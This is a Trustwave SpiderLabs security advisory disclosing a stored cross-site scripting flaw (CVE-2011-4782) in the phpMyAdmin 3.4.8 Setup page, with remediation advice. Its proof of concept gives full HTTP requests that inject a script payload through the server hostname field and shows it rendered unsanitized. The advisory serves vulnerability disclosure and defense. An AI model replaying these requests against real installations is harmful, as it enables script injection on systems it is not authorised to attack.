phpMyAdmin 3.4.8 Cross Site Scripting

`Trustwave's SpiderLabs Security Advisory TWSL2011-019:  
Cross-Site Scripting Vulnerability in phpMyAdmin  
  
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-019.txt  
  
Published: 12/22/11  
Version: 1.0  
  
Vendor: phpMyAdmin (http://www.phpmyadmin.net/)  
Product: phpMyAdmin  
Version affected: 3.4.8 and prior  
  
Product description:  
An open source tool developed in PHP to manage and administer MySQL  
databases remotely. The web browser interface allows creating, modifying  
or deleting databases, tables, fields or rows, executing SQL statements,  
and other database functions.  
  
Credit: Jason Leyrer of Trustwave SpiderLabs  
  
Finding 1: Cross-Site Scripting (XSS) Vulnerability in Setup Interface  
CVE: CVE-2011-4782  
  
Affected versions of phpMyAdmin do not sanitize user-supplied server names  
before displaying them in its Setup Overview. This allows remote attackers  
to execute arbitrary web scripts or HTML via a crafted request.  
  
phpMyAdmin allows users to add database servers via its Setup interface.  
Since phpMyAdmin doesn't do any input validation on server hostnames when  
they are entered, it is up to whatever displays these names throughout the  
application to use htmlspecialchars() (or similar) to sanitize them.  
  
phpMyAdmin uses a function called perform_config_checks() to perform a  
series of compatibility, security and consistency checks on application  
configuration options. If it finds settings that are contrary to best  
practices, perform_config_checks() generates messages to be displayed to  
users at the top of the Setup Overview page. The messages generated for  
some of these configuration options ($cfg['Servers'][$i]['ssl'],  
$cfg['Servers'][$i]['extension'], $cfg['Servers'][$i]['auth_type'],  
$cfg['Servers'][$i]['AllowRoot'], and  
$cfg['Servers'][$i]['AllowNoPassword']) are constructed using user-supplied  
hostnames without any sanitization taking place. This can lead to web  
script being executed when the Setup Overview page is loaded.  
  
The following is a Proof of Concept (PoC):  
  
1. Request the Setup interface's index page in order to obtain the  
phpMyAdmin cookie and the value of 'token', which appears in the response  
body:  
  
Request  
-------  
GET /phpmyadmin/setup/index.php HTTP/1.1  
  
Response  
--------  
HTTP/1.1 200 OK  
Date: Thu, 01 Dec 2011 16:42:17 GMT  
Server: Apache/2.2.20 (Ubuntu)  
X-Powered-By: PHP/5.3.6-13ubuntu3.2  
Set-Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; path=/phpmyadmin/setup/; HttpOnly  
Expires: Thu, 01 Dec 2011 16:42:17 GMT  
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0  
Last-Modified: Thu, 01 Dec 2011 16:42:17 GMT  
Set-Cookie: pma_lang=en; expires=Sat, 31-Dec-2011 16:42:17 GMT; path=/phpmyadmin/setup/; httponly  
X-Frame-Options: SAMEORIGIN  
X-Content-Security-Policy: allow 'self'; options inline-script eval-script; frame-ancestors 'self'; img-src 'self' data:; script-src 'self' www.phpmyadmin.net  
Pragma: no-cache  
Vary: Accept-Encoding  
Content-Length: 7722  
Content-Type: text/html; charset=utf-8  
  
---snip---  
  
<input type="hidden" name="token" value="5acce3a965bbe9d42ce50bdf3d491ed9" />  
  
  
2. Input javascript (%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E) to  
the 'Servers-0-host' input field in Add New Server mode, as shown in the  
postdata of the following request:  
  
  
Request  
-------  
POST /phpmyadmin/setup/index.php?phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf&tab_hash=&check_page_refresh=1&lang=en&collation_connection=utf8_general_ci&token=5acce3a965bbe9d42ce50bdf3d491ed9&page=servers&mode=add&submit=New+server HTTP/1.1  
Host: A.B.C.D  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Proxy-Connection: keep-alive  
Referer: http://A.B.C.D/phpmyadmin/setup/index.php?phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf&tab_hash=&check_page_refresh=1&lang=en&collation_connection=utf8_general_ci&token=5acce3a965bbe9d42ce50bdf3d491ed9&page=servers&mode=add&submit=New+server  
Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; pma_lang=en  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 1430  
  
tab_hash=&check_page_refresh=1&collation_connection=utf8_general_ci&token=5acce3a965bbe9d42ce50bdf3d491ed9&Servers-0-verbose=&Servers-0-host=%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&Servers-0-port=&Servers-0-socket=&Servers-0-connect_type=tcp&Servers-0-extension=mysqli&submit_save=Save&Servers-0-auth_type=cookie&Servers-0-user=root&Servers-0-password=&Servers-0-auth_swekey_config=&Servers-0-auth_http_realm=&Servers-0-SignonSession=&Servers-0-SignonURL=&Servers-0-LogoutURL=&Servers-0-only_db=&Servers-0-only_db-userprefs-allow=on&Servers-0-hide_db=&Servers-0-hide_db-userprefs-allow=on&Servers-0-AllowRoot=on&Servers-0-DisableIS=on&Servers-0-AllowDeny-order=&Servers-0-AllowDeny-rules=&Servers-0-ShowDatabasesCommand=SHOW+DATABASES&Servers-0-pmadb=&Servers-0-controluser=&Servers-0-controlpass=&Servers-0-verbose_check=on&Servers-0-bookmarktable=&Servers-0-relation=&Servers-0-userconfig=&Servers-0-table_info=&Servers-0-column_info=&Servers-0-history=&Servers-0-tracking=&Ser  
vers-0-table_coords=&Servers-0-pdf_pages=&Servers-0-designer_coords=&Servers-0-tracking_default_statements=CREATE+TABLE%2CALTER+TABLE%2CDROP+TABLE%2CRENAME+TABLE%2CCREATE+INDEX%2CDROP+INDEX%2CINSERT%2CUPDATE%2CDELETE%2CTRUNCATE%2CREPLACE%2CCREATE+VIEW%2CALTER+VIEW%2CDROP+VIEW%2CCREATE+DATABASE%2CALTER+DATABASE%2CDROP+DATABASE&Servers-0-tracking_add_drop_view=on&Servers-0-tracking_add_drop_table=on&Servers-0-tracking_add_drop_database=on  
  
  
3. View unsanitized script tags on the Setup overview page:  
  
Request  
-------  
GET /phpmyadmin/setup/index.php HTTP/1.1  
Host: A.B.C.D  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Proxy-Connection: keep-alive  
Referer: http://A.B.C.D/phpmyadmin/setup/index.php?phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf&tab_hash=&check_page_refresh=1&lang=en&collation_connection=utf8_general_ci&token=5acce3a965bbe9d42ce50bdf3d491ed9&page=servers&mode=add&submit=New+server  
Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; pma_lang=en  
  
Response  
--------  
HTTP/1.1 200 OK  
Date: Thu, 01 Dec 2011 16:44:18 GMT  
Server: Apache/2.2.20 (Ubuntu)  
X-Powered-By: PHP/5.3.6-13ubuntu3.2  
Expires: Thu, 01 Dec 2011 16:44:18 GMT  
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0  
Last-Modified: Thu, 01 Dec 2011 16:44:18 GMT  
X-Frame-Options: SAMEORIGIN  
X-Content-Security-Policy: allow 'self'; options inline-script eval-script; frame-ancestors 'self'; img-src 'self' data:; script-src 'self' www.phpmyadmin.net  
Pragma: no-cache  
Vary: Accept-Encoding  
Content-Length: 7852  
Content-Type: text/html; charset=utf-8  
  
---snip---  
  
<div class="notice" id="Servers/1/ssl"><h4>Use SSL (<script>alert('XSS');</script>)</h4>You should use SSL connections if your web server supports it.</div>  
  
Please note that valid database credentials are not required to exploit  
this vulnerability.  
  
  
Remediation Steps:  
phpMyAdmin version 3.4.9 includes a fix for this security issue. Apply  
the appropriate vendor updates for this product or upgrade to a current and  
secure version of PHPMyAdmin.  
  
  
Revision History:  
12/7/11 - Vulnerability disclosed  
12/21/11 - Patch released by vendor  
12/22/11 - Advisory published  
  
  
About Trustwave:  
Trustwave is the leading provider of on-demand and subscription-based  
information security and payment card industry compliance management  
solutions to businesses and government entities throughout the world. For  
organizations faced with today's challenging data security and compliance  
environment, Trustwave provides a unique approach with comprehensive  
solutions that include its flagship TrustKeeper compliance management  
software and other proprietary security solutions. Trustwave has helped  
thousands of organizations--ranging from Fortune 500 businesses and large  
financial institutions to small and medium-sized retailers--manage  
compliance and secure their network infrastructure, data communications and  
critical information assets. Trustwave is headquartered in Chicago with  
offices throughout North America, South America, Europe, Africa, China and  
Australia. For more information, visit https://www.trustwave.com  
  
About Trustwave's SpiderLabs:  
SpiderLabs(R) is the advanced security team at Trustwave focused on  
application security, incident response, penetration testing, physical  
security and security research. The team has performed over a thousand  
incident investigations, thousands of penetration tests and hundreds of  
application security tests globally. In addition, the SpiderLabs Research  
team provides intelligence through bleeding-edge research and proof of  
concept tool development to enhance Trustwave's products and services.  
https://www.trustwave.com/spiderlabs  
  
Disclaimer:  
The information provided in this advisory is provided "as is" without  
warranty of any kind. Trustwave disclaims all warranties, either express or  
implied, including the warranties of merchantability and fitness for a  
particular purpose. In no event shall Trustwave or its suppliers be liable  
for any damages whatsoever including direct, indirect, incidental,  
consequential, loss of business profits or special damages, even if  
Trustwave or its suppliers have been advised of the possibility of such  
damages. Some states do not allow the exclusion or limitation of liability  
for consequential or incidental damages so the foregoing limitation may not  
apply.  
  
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.  
  
`